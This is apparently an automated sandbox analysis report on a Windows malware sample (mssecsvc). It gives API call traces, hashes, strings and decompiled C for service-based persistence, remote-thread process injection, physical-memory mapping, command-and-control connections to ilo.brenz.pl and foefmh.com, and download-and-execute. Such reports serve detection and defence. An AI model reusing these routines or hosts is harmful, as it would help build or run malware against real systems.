                                                                                • socket.WS2_32(00000002,00000001,00000000), ref: 00B94097
                                                                                • connect.WS2_32(6F6C6902,00B93B09,00000010), ref: 00B940B1
                                                                                • GetVersionExA.KERNEL32(?,?,00000000), ref: 00B940FB
                                                                                • wsprintfA.USER32 ref: 00B94179
                                                                                • SetEvent.KERNEL32(000002A0,?,00000000), ref: 00B942D6
                                                                                • Sleep.KERNEL32(00007530,?,00000000), ref: 00B942F7
                                                                                • ResetEvent.KERNEL32(000002A0,?,00000000), ref: 00B9430A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.665390921.0000000000B90000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_b90000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateEvent$CloseHandleThreadwsprintf$AddressCountFileInformationLibraryLoadModuleNameProcResetSleepTickVersionVolumeconnectsocket
                                                                                • String ID: ADVAPI32.DLL$C:,$C:\Program Files (x86)\aTwFNAGdoqLJURiXcTGokJdKeSQPqaRNmsCjqFpSto\duSwPkmjzxh.exe$C:\WINDOWS\TASKSCHE.EXE$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
                                                                                • API String ID: 1567941233-4180491618
                                                                                • Opcode ID: 8f5bda587157e99726d781c634e3378632d432898dcbe4ad85f90d404c80ec81
                                                                                • Instruction ID: f680fbca08bc1336e804d03f005211dc4792c8a6f2568d4fae020b89613d8cc1
                                                                                • Opcode Fuzzy Hash: 8f5bda587157e99726d781c634e3378632d432898dcbe4ad85f90d404c80ec81
                                                                                • Instruction Fuzzy Hash: 91E1FE71918258BFEF25AF648C4ABEA3BECEF41700F0045A9EC499E082D7F45F468765
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 7FEA042D Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 290memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(00000000), ref: 7FEA04BE
                                                                                • GetVersion.KERNEL32 ref: 7FEA0500
                                                                                • VirtualAlloc.KERNEL32(00000000,000077C4,08001000,00000040), ref: 7FEA0528
                                                                                • CloseHandle.KERNEL32(?), ref: 7FEA05AD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.667969815.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Handle$AllocCloseModuleVersionVirtual
                                                                                • String ID: \BaseNamedObjects\reytVt$\BaseNamedObjects\reytVt$csrs
                                                                                • API String ID: 3017432202-2732440246
                                                                                • Opcode ID: 1675a9fdbf51ac598faf71083b84e51afed01ab3c173c7fa300afc3e2da58e2b
                                                                                • Instruction ID: e39f82f75279f079b55252e40bf08981b0556bbd7f8c8fefce01ca585becc201
                                                                                • Opcode Fuzzy Hash: 1675a9fdbf51ac598faf71083b84e51afed01ab3c173c7fa300afc3e2da58e2b
                                                                                • Instruction Fuzzy Hash: AEB19D71506349FFEB229F24C849BFA3BA9FF45715F000128EA0A9E181C7F69B45CB59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 7FEA05F2 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 193stringnativeprocessCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CloseHandle.KERNEL32(?), ref: 7FEA05AD
                                                                                • GetModuleHandleA.KERNEL32(7FEA05EC), ref: 7FEA05F2
                                                                                • lstrcpyW.KERNEL32(\BaseNamedObjects\reytVt,\BaseNamedObjects\reytVt), ref: 7FEA070A
                                                                                • lstrcpyW.KERNEL32(\BaseNamedObjects\reytVt,?), ref: 7FEA072D
                                                                                • lstrcatW.KERNEL32(\BaseNamedObjects\reytVt,\reytVt), ref: 7FEA073B
                                                                                • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,000077C4,00000000,?,00000002,00000000,00000040), ref: 7FEA076B
                                                                                • NtOpenProcessToken.NTDLL(000000FF,00000020), ref: 7FEA0786
                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 7FEA07C9
                                                                                • Process32First.KERNEL32 ref: 7FEA07DC
                                                                                • Process32Next.KERNEL32 ref: 7FEA07ED
                                                                                • OpenProcess.KERNEL32(0000002A,00000000,?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 7FEA0805
                                                                                • CreateRemoteThread.KERNEL32(?,00000000,00000000,-00003C38,00000002,00000000), ref: 7FEA0842
                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 7FEA085D
                                                                                • CloseHandle.KERNEL32 ref: 7FEA086C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.667969815.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Handle$Close$CreateOpenProcessProcess32lstrcpy$FirstModuleNextRemoteSectionSnapshotThreadTokenToolhelp32Viewlstrcat
                                                                                • String ID: \BaseNamedObjects\reytVt$\BaseNamedObjects\reytVt$csrs
                                                                                • API String ID: 1545766225-2732440246
                                                                                • Opcode ID: 6f9a7df2d700082444de55d317e6829b265054e97730b2f7bba8831fc2cb823c
                                                                                • Instruction ID: 6bb25a9d95e52be30e4605fb117e034fee3c02357048fedf3e31c310afd2240a
                                                                                • Opcode Fuzzy Hash: 6f9a7df2d700082444de55d317e6829b265054e97730b2f7bba8831fc2cb823c
                                                                                • Instruction Fuzzy Hash: 51715D31505205FFEB219F20CC49BBE3BBEEF85715F100068EA0A9E491C7B69F459B59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 7FEA4178 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 192networksleepstringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • lstrlen.KERNEL32(ilo.brenz.pl,?,00000000), ref: 7FEA4057
                                                                                • gethostbyname.WS2_32(ilo.brenz.pl), ref: 7FEA4066
                                                                                • socket.WS2_32(00000002,00000001,00000000), ref: 7FEA4097
                                                                                • connect.WS2_32(6F6C6902,7FEA3B09,00000010), ref: 7FEA40B1
                                                                                • GetVersionExA.KERNEL32(?,?,00000000), ref: 7FEA40FB
                                                                                • wsprintfA.USER32 ref: 7FEA4179
                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00003819,6F6C6902,00000000), ref: 7FEA41B4
                                                                                • CloseHandle.KERNEL32(?,00000000,6F6C6902,7FEA6AA2,00000000,00000000), ref: 7FEA41BD
                                                                                • GetTickCount.KERNEL32 ref: 7FEA41F6
                                                                                • Sleep.KERNEL32(00000064,?,00000000,6F6C6902,7FEA6AA2,00000000,00000000), ref: 7FEA428B
                                                                                • GetTickCount.KERNEL32 ref: 7FEA4294
                                                                                • closesocket.WS2_32(6F6C6902), ref: 7FEA42B8
                                                                                • SetEvent.KERNEL32(000002A0,?,00000000), ref: 7FEA42D6
                                                                                • Sleep.KERNEL32(00007530,?,00000000), ref: 7FEA42F7
                                                                                • ResetEvent.KERNEL32(000002A0,?,00000000), ref: 7FEA430A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.667969815.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountEventSleepTick$CloseCreateHandleResetThreadVersionclosesocketconnectgethostbynamelstrlensocketwsprintf
                                                                                • String ID: C:\Program Files (x86)\aTwFNAGdoqLJURiXcTGokJdKeSQPqaRNmsCjqFpSto\duSwPkmjzxh.exe$C:\WINDOWS\TASKSCHE.EXE
                                                                                • API String ID: 883794535-2519926966
                                                                                • Opcode ID: 76922eb7f863b4f87123e600b2d48a0325e63692d2b32f1f917fbf14117c4ef4
                                                                                • Instruction ID: 62042b7e1d70db51705c832b3ce7fc9885254b828fc8a61664828cce23236026
                                                                                • Opcode Fuzzy Hash: 76922eb7f863b4f87123e600b2d48a0325e63692d2b32f1f917fbf14117c4ef4
                                                                                • Instruction Fuzzy Hash: AD71EF75508348BAEB229F3488587EEBFAEEF81314F000608E85A9E1D1C7F66F45D761
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00B94178 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 192networksleepstringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • lstrlen.KERNEL32(ilo.brenz.pl,?,00000000), ref: 00B94057
                                                                                • gethostbyname.WS2_32(ilo.brenz.pl), ref: 00B94066
                                                                                • socket.WS2_32(00000002,00000001,00000000), ref: 00B94097
                                                                                • connect.WS2_32(6F6C6902,00B93B09,00000010), ref: 00B940B1
                                                                                • GetVersionExA.KERNEL32(?,?,00000000), ref: 00B940FB
                                                                                • wsprintfA.USER32 ref: 00B94179
                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00003819,6F6C6902,00000000), ref: 00B941B4
                                                                                • CloseHandle.KERNEL32(?,00000000,6F6C6902,00B96AA2,00000000,00000000), ref: 00B941BD
                                                                                • GetTickCount.KERNEL32 ref: 00B941F6
                                                                                • Sleep.KERNEL32(00000064,?,00000000,6F6C6902,00B96AA2,00000000,00000000), ref: 00B9428B
                                                                                • GetTickCount.KERNEL32 ref: 00B94294
                                                                                • closesocket.WS2_32(6F6C6902), ref: 00B942B8
                                                                                • SetEvent.KERNEL32(000002A0,?,00000000), ref: 00B942D6
                                                                                • Sleep.KERNEL32(00007530,?,00000000), ref: 00B942F7
                                                                                • ResetEvent.KERNEL32(000002A0,?,00000000), ref: 00B9430A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.665390921.0000000000B90000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_b90000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountEventSleepTick$CloseCreateHandleResetThreadVersionclosesocketconnectgethostbynamelstrlensocketwsprintf
                                                                                • String ID: C:\Program Files (x86)\aTwFNAGdoqLJURiXcTGokJdKeSQPqaRNmsCjqFpSto\duSwPkmjzxh.exe$C:\WINDOWS\TASKSCHE.EXE
                                                                                • API String ID: 883794535-2519926966
                                                                                • Opcode ID: 76922eb7f863b4f87123e600b2d48a0325e63692d2b32f1f917fbf14117c4ef4
                                                                                • Instruction ID: c37d60f47d86bb3eecc432c95da2ee5c9310acc6d4db4a8cd5fa269faa92a9fa
                                                                                • Opcode Fuzzy Hash: 76922eb7f863b4f87123e600b2d48a0325e63692d2b32f1f917fbf14117c4ef4
                                                                                • Instruction Fuzzy Hash: 3271EB71518258BAEF259F34881DBAE7FEDEF42314F0446A8E85A9E081C3F45F42C765
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00B9388E Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 127networksleeptimeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetSystemTime.KERNEL32(00B97584), ref: 00B9389F
                                                                                • Sleep.KERNEL32(0000EA60), ref: 00B93911
                                                                                • InternetGetConnectedState.WININET(?,00000000), ref: 00B9392A
                                                                                • gethostbyname.WS2_32(0D278125), ref: 00B9396C
                                                                                • socket.WS2_32(00000002,00000001,00000000), ref: 00B93981
                                                                                • ioctlsocket.WS2_32(?,8004667E), ref: 00B9399A
                                                                                • connect.WS2_32(?,?,00000010), ref: 00B939B3
                                                                                • Sleep.KERNEL32(?,00000010,BB010002,00000000,8004667E,?,00000001), ref: 00B939C1
                                                                                • closesocket.WS2_32 ref: 00B93A20
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.665390921.0000000000B90000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_b90000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Sleep$ConnectedInternetStateSystemTimeclosesocketconnectgethostbynameioctlsocketsocket
                                                                                • String ID: foefmh.com
                                                                                • API String ID: 159131500-183919301
                                                                                • Opcode ID: b9cbcd502034ca6391bc477693aeae1c9470f5e239758c46d06d44a479c792e4
                                                                                • Instruction ID: 8799a771365990f44e40757cebbc09b331dcd43da5050cc57195d8ef07475e06
                                                                                • Opcode Fuzzy Hash: b9cbcd502034ca6391bc477693aeae1c9470f5e239758c46d06d44a479c792e4
                                                                                • Instruction Fuzzy Hash: 2441AF31604248BAEF219E208C4EBAD7BDEEF85B10F1440A9F94ADE181D7F59F408721
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00407C40 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 54serviceCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00407C40() {
				char _v260;
				void* _t15;
				void* _t17;

				sprintf( &_v260, "%s -m security", 0x70f760);
				_t15 = OpenSCManagerA(0, 0, 0xf003f);
				if(_t15 == 0) {
					return 0;
				} else {
					_t17 = CreateServiceA(_t15, "mssecsvc2.0", "Microsoft Security Center (2.0) Service", 0xf01ff, 0x10, 2, 1,  &_v260, 0, 0, 0, 0, 0);
					if(_t17 != 0) {
						StartServiceA(_t17, 0, 0);
						CloseServiceHandle(_t17);
					}
					CloseServiceHandle(_t15);
					return 0;
				}
			}






                                                                                0x00407c56
                                                                                0x00407c6e
                                                                                0x00407c72
                                                                                0x00407cd3
                                                                                0x00407c74
                                                                                0x00407ca7
                                                                                0x00407cab
                                                                                0x00407cb2
                                                                                0x00407cb9
                                                                                0x00407cb9
                                                                                0x00407cbc
                                                                                0x00407cc9
                                                                                0x00407cc9

                                                                                APIs
                                                                                • sprintf.MSVCRT ref: 00407C56
                                                                                • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 00407C68
                                                                                • CreateServiceA.ADVAPI32(00000000,mssecsvc2.0,Microsoft Security Center (2.0) Service,000F01FF,00000010,00000002,00000001,?,00000000,00000000,00000000,00000000,00000000,6F89FB10,00000000), ref: 00407C9B
                                                                                • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 00407CB2
                                                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 00407CB9
                                                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 00407CBC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.663214895.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.663184131.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.663260796.0000000000409000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.663302461.000000000040A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.663328344.000000000040B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.663379016.000000000040F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.663454036.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.663555779.0000000000710000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.665288410.0000000000A6B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Service$CloseHandle$CreateManagerOpenStartsprintf
                                                                                • String ID: %s -m security$Microsoft Security Center (2.0) Service$mssecsvc2.0
                                                                                • API String ID: 3340711343-4063779371
                                                                                • Opcode ID: c3592d809756ac94f014d34e1e4fa0c14de5620095203194e3f9233ad68c92ee
                                                                                • Instruction ID: 2288e5cc66680fabefb91112cf05624c6df81315eb9d87428618c258e2ee617f
                                                                                • Opcode Fuzzy Hash: c3592d809756ac94f014d34e1e4fa0c14de5620095203194e3f9233ad68c92ee
                                                                                • Instruction Fuzzy Hash: AD01D1717C43043BF2305B149D8BFEB3658AB84F01F500025FB44B92D0DAF9A81491AF
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00408090 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 49serviceCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 86%
                                                                                			E00408090() {
				char* _v4;
				char* _v8;
				intOrPtr _v12;
				struct _SERVICE_TABLE_ENTRY _v16;
				long _t6;
				void* _t19;
				void* _t22;

				_t6 = GetModuleFileNameA(0, 0x70f760, 0x104);
				__imp____p___argc();
				_t26 =  *_t6 - 2;
				if( *_t6 >= 2) {
					_t19 = OpenSCManagerA(0, 0, 0xf003f);
					__eflags = _t19;
					if(_t19 != 0) {
						_t22 = OpenServiceA(_t19, "mssecsvc2.0", 0xf01ff);
						__eflags = _t22;
						if(_t22 != 0) {
							E00407FA0(_t22, 0x3c);
							CloseServiceHandle(_t22);
						}
						CloseServiceHandle(_t19);
					}
					_v16 = "mssecsvc2.0";
					_v12 = 0x408000;
					_v8 = 0;
					_v4 = 0;
					return StartServiceCtrlDispatcherA( &_v16);
				} else {
					return E00407F20(_t26);
				}
			}










                                                                                0x0040809f
                                                                                0x004080a5
                                                                                0x004080ab
                                                                                0x004080ae
                                                                                0x004080c9
                                                                                0x004080cb
                                                                                0x004080cd
                                                                                0x004080e8
                                                                                0x004080ea
                                                                                0x004080ec
                                                                                0x004080f1
                                                                                0x004080fa
                                                                                0x004080fa
                                                                                0x004080fd
                                                                                0x00408100
                                                                                0x00408105
                                                                                0x0040810e
                                                                                0x00408116
                                                                                0x0040811e
                                                                                0x00408130
                                                                                0x004080b0
                                                                                0x004080b8
                                                                                0x004080b8

                                                                                APIs
                                                                                • GetModuleFileNameA.KERNEL32(00000000,0070F760,00000104,?,004081B2), ref: 0040809F
                                                                                • __p___argc.MSVCRT ref: 004080A5
                                                                                • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,00000000,?,004081B2), ref: 004080C3
                                                                                • OpenServiceA.ADVAPI32(00000000,mssecsvc2.0,000F01FF,6F89FB10,00000000,?,004081B2), ref: 004080DC
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,004081B2), ref: 004080FA
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,004081B2), ref: 004080FD
                                                                                • StartServiceCtrlDispatcherA.ADVAPI32(?,?,?), ref: 00408126
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.663214895.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.663184131.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.663260796.0000000000409000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.663302461.000000000040A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.663328344.000000000040B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.663379016.000000000040F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.663454036.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.663555779.0000000000710000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.665288410.0000000000A6B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Service$CloseHandleOpen$CtrlDispatcherFileManagerModuleNameStart__p___argc
                                                                                • String ID: mssecsvc2.0
                                                                                • API String ID: 4274534310-3729025388
                                                                                • Opcode ID: 14f2d0f9cf239aa653f070f930b60ae04978eb0b591616557438e437b3700a6a
                                                                                • Instruction ID: 0eddf8d8cc97b5ba853ece0b0f9ce4fe0dc31dc3004373c78c05f92e851b2f94
                                                                                • Opcode Fuzzy Hash: 14f2d0f9cf239aa653f070f930b60ae04978eb0b591616557438e437b3700a6a
                                                                                • Instruction Fuzzy Hash: 4A014775640315BBE3117F149E4AF6F3AA4EF80B19F404429F544762D2DFB888188AAF
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 7FEA33E0 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 220filenativeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • NtOpenSection.NTDLL(?,00000006,?,00000018,?,?,00000040,?,?,63697379), ref: 7FEA344A
                                                                                • NtQuerySystemInformation.NTDLL(0000000B,?,00000120,00000000), ref: 7FEA3469
                                                                                • MapViewOfFile.KERNEL32(?,00000006,00000000,?,?,?,00000120,00000000), ref: 7FEA3493
                                                                                • CloseHandle.KERNEL32(?,00000000,?,00000120,00000000), ref: 7FEA34A0
                                                                                • UnmapViewOfFile.KERNEL32(?), ref: 7FEA34B8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.667969815.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileView$CloseHandleInformationOpenQuerySectionSystemUnmap
                                                                                • String ID: C:,$\Device\PhysicalMemory
                                                                                • API String ID: 2985292042-1440550476
                                                                                • Opcode ID: b4d3e096044a212734f125868e85b1e2327fa10042064e7aff92d63e5b5619a7
                                                                                • Instruction ID: 89bc292a39abda77eba81180b1336a71123f95df307fbb064623dea506d6362f
                                                                                • Opcode Fuzzy Hash: b4d3e096044a212734f125868e85b1e2327fa10042064e7aff92d63e5b5619a7
                                                                                • Instruction Fuzzy Hash: 5A817671500208FFEB218F14CC89ABA7BADEF44704F504658ED1A9F295D7F2AF458BA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00B933E0 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 220filenativeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • NtOpenSection.NTDLL(?,00000006,?,00000018,?,?,00000040,?,?,63697379), ref: 00B9344A
                                                                                • NtQuerySystemInformation.NTDLL(0000000B,?,00000120,00000000), ref: 00B93469
                                                                                • MapViewOfFile.KERNEL32(?,00000006,00000000,?,?,?,00000120,00000000), ref: 00B93493
                                                                                • CloseHandle.KERNEL32(?,00000000,?,00000120,00000000), ref: 00B934A0
                                                                                • UnmapViewOfFile.KERNEL32(?), ref: 00B934B8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.665390921.0000000000B90000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_b90000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileView$CloseHandleInformationOpenQuerySectionSystemUnmap
                                                                                • String ID: C:,$\Device\PhysicalMemory
                                                                                • API String ID: 2985292042-1440550476
                                                                                • Opcode ID: b4d3e096044a212734f125868e85b1e2327fa10042064e7aff92d63e5b5619a7
                                                                                • Instruction ID: 8a1b030a29d6ff6369e34e1c161b1177c42ac616d87be63800df4deb6355de34
                                                                                • Opcode Fuzzy Hash: b4d3e096044a212734f125868e85b1e2327fa10042064e7aff92d63e5b5619a7
                                                                                • Instruction Fuzzy Hash: 31818B71500208FFEB248F14CC89AAA3BBCEF48B14F514568ED199B291D7F4AF45CA64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 7FEA3405 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 61filenativeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • NtOpenSection.NTDLL(?,00000006,?,00000018,?,?,00000040,?,?,63697379), ref: 7FEA344A
                                                                                • NtQuerySystemInformation.NTDLL(0000000B,?,00000120,00000000), ref: 7FEA3469
                                                                                • MapViewOfFile.KERNEL32(?,00000006,00000000,?,?,?,00000120,00000000), ref: 7FEA3493
                                                                                • CloseHandle.KERNEL32(?,00000000,?,00000120,00000000), ref: 7FEA34A0
                                                                                • UnmapViewOfFile.KERNEL32(?), ref: 7FEA34B8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.667969815.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileView$CloseHandleInformationOpenQuerySectionSystemUnmap
                                                                                • String ID: C:,$ysic
                                                                                • API String ID: 2985292042-2852681185
                                                                                • Opcode ID: 75692eae59ef229a2f56f45455e385a3c03fd5a3a941212ab90a82f7e6085517
                                                                                • Instruction ID: 20dbb16ab5d0e33e58175ecc7424444a29ed84bf4ea1b595fcedbc50fe00d084
                                                                                • Opcode Fuzzy Hash: 75692eae59ef229a2f56f45455e385a3c03fd5a3a941212ab90a82f7e6085517
                                                                                • Instruction Fuzzy Hash: D5115B74140608BFEB21CF10CC55FAA7A7DEF88704F50451CEA1A9E290EBF56F188A68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00B93405 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 61filenativeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • NtOpenSection.NTDLL(?,00000006,?,00000018,?,?,00000040,?,?,63697379), ref: 00B9344A
                                                                                • NtQuerySystemInformation.NTDLL(0000000B,?,00000120,00000000), ref: 00B93469
                                                                                • MapViewOfFile.KERNEL32(?,00000006,00000000,?,?,?,00000120,00000000), ref: 00B93493
                                                                                • CloseHandle.KERNEL32(?,00000000,?,00000120,00000000), ref: 00B934A0
                                                                                • UnmapViewOfFile.KERNEL32(?), ref: 00B934B8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.665390921.0000000000B90000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_b90000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileView$CloseHandleInformationOpenQuerySectionSystemUnmap
                                                                                • String ID: C:,$ysic
                                                                                • API String ID: 2985292042-2852681185
                                                                                • Opcode ID: 75692eae59ef229a2f56f45455e385a3c03fd5a3a941212ab90a82f7e6085517
                                                                                • Instruction ID: 83c528af91c7e0bf05e58f71dcead99598b4a9ba0ff4ede89f5b3b17820f9002
                                                                                • Opcode Fuzzy Hash: 75692eae59ef229a2f56f45455e385a3c03fd5a3a941212ab90a82f7e6085517
                                                                                • Instruction Fuzzy Hash: AD116D70140608BBEB24CF14CC59FAA36BCEF88B04F51452CEA199B290E7F46F148A68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00B927A7 Relevance: 12.1, APIs: 8, Instructions: 65filenetworkprocessCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetTempFileNameA.KERNEL32(?,00B927A3,00000000,?), ref: 00B927A8
                                                                                • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,?,00B927A3,00000000,?), ref: 00B927C3
                                                                                • InternetReadFile.WININET(?,?,00000104), ref: 00B927DD
                                                                                • WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000104,?,00000000,?,00B927A3,00000000,?), ref: 00B927F3
                                                                                • CloseHandle.KERNEL32(?,00000104,?,00000000,?,00B927A3,00000000,?), ref: 00B927FF
                                                                                • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000104,?,00000000,?,00B927A3), ref: 00B92823
                                                                                • InternetCloseHandle.WININET(?), ref: 00B92833
                                                                                • InternetCloseHandle.WININET(00000000), ref: 00B9283A
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.665390921.0000000000B90000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_b90000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CloseHandleInternet$Create$NameProcessReadTempWrite
                                                                                • String ID:
                                                                                • API String ID: 3452404049-0
                                                                                • Opcode ID: bbf5c5561a5178fb7ef464295b4b729c13e68fcf671b41c3dcb44b7c67eff673
                                                                                • Instruction ID: 2db4c990009dd7595c00353e2347a3e3c39d4e7131d57356dcf057fcc475db04
